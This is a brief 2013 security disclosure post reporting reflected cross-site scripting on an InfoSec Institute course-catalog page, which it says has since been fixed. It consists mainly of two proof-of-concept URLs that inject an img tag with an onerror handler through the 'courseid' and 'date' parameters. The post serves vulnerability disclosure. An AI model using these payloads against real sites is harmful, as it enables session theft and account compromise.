XSS in InfoSec Institute

2013-03-21

Rafay Baloch

[The XSS PoCs below were submitted to Errata by Rafay. Rafay disclosed the issues to InfoSec Institute, who fixed them prior to the publication of this post. For more information on InfoSec Institute (ISI), see their charlatan page!]

POC:
http://mail.infosecinstitute.com/request_course_catalog.html?courseid=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E
http://mail.infosecinstitute.com/request_course_catalog.html?date=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E

